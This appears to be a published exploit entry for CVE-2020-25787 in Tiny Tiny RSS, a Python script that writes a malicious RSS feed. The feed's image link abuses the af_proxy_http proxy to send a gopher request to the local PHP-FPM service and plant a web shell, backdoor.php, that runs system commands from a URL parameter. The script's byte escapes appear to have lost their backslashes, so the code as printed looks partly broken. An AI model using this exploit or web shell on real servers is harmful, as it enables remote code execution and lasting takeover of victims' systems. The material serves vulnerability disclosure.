Tiny Tiny RSS – Remote Code Execution

# Exploit Title: Tiny Tiny RSS - Remote Code Execution
# Date: 21/09/2020
# Exploit Author: Daniel Neagaru & Benjamin Nadarević
# Blog post: https://www.digeex.de/blog/tinytinyrss/
# Software Link: https://git.tt-rss.org/fox/tt-rss
# Version: all before 2020-09-16
# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef
# Tested on: default docker installation method
# CVE : CVE-2020-25787

#!/usr/bin/env python3

from sys import argv
import urllib.parse as ul
import base64


def CustomFcgi( filename, output, backdoor):
    length=len(output)+len(backdoor)+64
    char=chr(length)

    data = "x0fx10SERVER_SOFTWAREgo / fcgiclient x0btREMOTE_ADDR127.0.0.1x0fx08SERVER_PROTOCOLHTTP/1.1x0e" + chr(len(str(length)))
    data += "CONTENT_LENGTH" + str(length) +  "x0ex04REQUEST_METHODPOSTtKPHP_VALUEallow_url_include = Onn"
    data += "disable_functions = nauto_prepend_file = php://inputx0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "rx01DOCUMENT_ROOT/"

    temp1 = chr(len(data) // 256)
    temp2 = chr(len(data) % 256)
    temp3 = chr(len(data) % 8)

    end = str("x00"*(len(data)%8)) + "x01x04x00x01x00x00x00x00x01x05x00x01x00" + char + "x04x00"
    end += "< ?php file_put_contents('" + output + "',base64_decode("+ "'"+str(backdoor.decode('ascii'))+"')"+");die('executed');?>x00x00x00x00"
    start = "x01x01x00x01x00x08x00x00x00x01x00x00x00x00x00x00x01x04x00x01" + temp1 + temp2 + temp3 + "x00"

    payload = start + data + end
    def get_payload(payload):
        finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/")
        return finalpayload

    return "gopher://localhost:9000/_"+get_payload(get_payload(payload))



TTRSS_PATH = "/var/www/html/tt-rss/"
BACKDOOR_CODE = """
< ?php echo "successn"; echo system($_GET['cmd']); ?>
"""


feed_file = open("malicious_RCE_feed.xml",'w')
filename = TTRSS_PATH + "config.php"
output = TTRSS_PATH + "backdoor.php"

backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii"))
rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text"

feed ="""< ?xml version="1.0" encoding="UTF-8" ?>


  Exploit demo - rce
  
  You are getting infected :(
  
     Check if there is backdoor.php
    < ![CDATA[backdoor.php?cmd=id&bypass_filter=://]]>
    
    < ![CDATA[
        Dummy text

        <img src="{}" />

    ]]>

  


""".format(rce)

feed_file.write(feed)
feed_file.close()

            

Comments are closed.